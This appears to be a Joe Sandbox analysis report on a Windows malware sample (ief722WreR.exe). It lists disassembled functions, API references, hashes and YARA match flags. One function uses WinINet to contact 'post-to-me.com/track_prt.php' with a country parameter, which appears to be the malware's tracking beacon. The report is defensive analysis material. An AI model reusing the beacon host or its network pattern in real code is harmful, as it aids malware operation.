Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 02497B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024929A4: TlsGetValue.KERNEL32(?,?,02490DC2,02492ECF,00000000,?,02490DA0,?,?,?,00000000,?,00000000), ref: 024929AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02497BB1

Part of subcall function 024A121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024A1241
Part of subcall function 024A121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024A125A
Part of subcall function 024A121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024A12D0
Part of subcall function 024A121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024A12D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02497BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02497BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02497BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02497BF1

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: a83c842435ca6e27417826ba7a964d08c1b266a7805b9cdadba250df14e66252
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 62F0C2716002186BCF15F677982096EFF2BDF90B18B04426FD80053350DF65DA058FD1

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 024BA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024BA0C4

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024BA0D6
_free.LIBCMT ref: 024BA0E8
_free.LIBCMT ref: 024BA0FA
_free.LIBCMT ref: 024BA10C

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 654b7c37884042a49afc0c137c61ddce4079d8ff2257fe4b2a94b73b21beabda
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: ACF06232505220AB8672EF66E8C6C8777DAAE04750B64095BF048D7B11CB71F8A09E79

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 024B1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B19AF

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024B19C1
_free.LIBCMT ref: 024B19D4
_free.LIBCMT ref: 024B19E5
_free.LIBCMT ref: 024B19F6

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: fb1bb5be7febef862022fbb464458d35641d881de5064fe1cdfc8ab087246599
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: D8F03070D003509B9F726F26AD804453F61AF09B2270002ABF406977B2C774E862EFAE

Function 0249CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0249CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0249CF67
GetCurrentThread.KERNEL32 ref: 0249CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0249CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0249CF8C

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 634eb2d87e94ed821d7307fdc3aea86e6dd17fac859f214e31ef4a9a8b1c95f7
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 7FF01236200500DBCE25FF62E690ABABFA6AFC8610310455FD58B07594DF25A946DB61

Function 02482E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02482E8E

Part of subcall function 02481321: _wcslen.LIBCMT ref: 02481328
Part of subcall function 02481321: _wcslen.LIBCMT ref: 02481344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024830A1

Strings

&cc=DE, xrefs: 0248301B, 02483021, 0248307E
https://post-to-me.com/track_prt.php?sub=, xrefs: 02482EBE, 02482FEA, 02483059

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: 3a708d444c607f1697bd817b8d7f1749b0c8bc1023139c773399686e55acc755
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: 4F5153A5E65344A8E320EFB0BC55B763378FF58712F10543BD528CB2B2E7A19944871E

Function 024A8937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 024A896A
__IsNonwritableInCurrentImage.LIBCMT ref: 024A8A23

Strings

csm, xrefs: 024A8A0D
fB, xrefs: 024A8A15, 024A8A1E, 024A8A2F

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: df6fa2852c09fe5f23a0799c00fc7f7790f618e07e14ce8f3082f429940796be
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 4941F430A00248DBCF10DF29C864AAEBFB5FF55328F14816BE9155B391D7329A01CF91

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ief722WreR.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\ief722WreR.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\ief722WreR.exe
API String ID: 2506810119-4191418122
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 024AF97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ief722WreR.exe,00000104), ref: 024AF9BA
_free.LIBCMT ref: 024AFA85
_free.LIBCMT ref: 024AFA8F

Strings

C:\Users\user\Desktop\ief722WreR.exe, xrefs: 024AF9B1, 024AF9B8, 024AF9E7, 024AFA1F

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\ief722WreR.exe
API String ID: 2506810119-4191418122
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 90670392e91c76f0de834511ec291e6364f03e4880f5e8065bfcdd84af91bb2b
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: A5319F71A00218EBDB21DF9ADC909DEBBFCEFA9710B11406BE80597621D7719A45CBA0

Function 0248C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0248C8DE

Strings

ios_base::eofbit set, xrefs: 0248C8B0
ios_base::badbit set, xrefs: 0248C8A1, 0248C8C1
ios_base::failbit set, xrefs: 0248C8AB

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: e156c074c35c76abf7a167dc6cb9f16a5921ac0b2c9ea4de9ba6ca0abff0be3e
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: C9F02BB28902086BCB08F554CC81BEF33989B15316F04806FEE42AB182EB689945CBB4

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

pScheduler, xrefs: 00415DB2
version, xrefs: 00415D9F

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 024B5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 024B5B8A
__alldvrm.LIBCMT ref: 024B5D8B
__alldvrm.LIBCMT ref: 024B5DAD

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: f0edb284ff9d10d3d76a5d0d67dae2d2e15d3feffadf350e7c9a46ec075d46fd
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 3EA136759043869FDB238F28C8917EEFBA6EF15310F58826FD5859B381C7348942CB60

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 024BFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024BFD9E

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: 095c710ee9e994dcb2b9cfb679337f9f9b236fc9f4050e306e2b2a75d027de5c
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: 36411B31A001016BDB276FBA8C54BEF3A6EEF55770F15062BF42DD6690D73444498A71

Function 024B6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024B047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024B6B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024B6BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024B6BEC
__freea.LIBCMT ref: 024B6BF5

Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 63321ccd77c4759da82375cd2f086b743bbe8154c7d3b96501322c6172a1f708
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: CB31A072A0021AABDF269F65CC80DEF7BB9EF40714B0A426EEC14D7250E735D951CBA0

Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D443
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D45D
_xtime_get.LIBCPMT ref: 0040D480
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D48C

Memory Dump Source

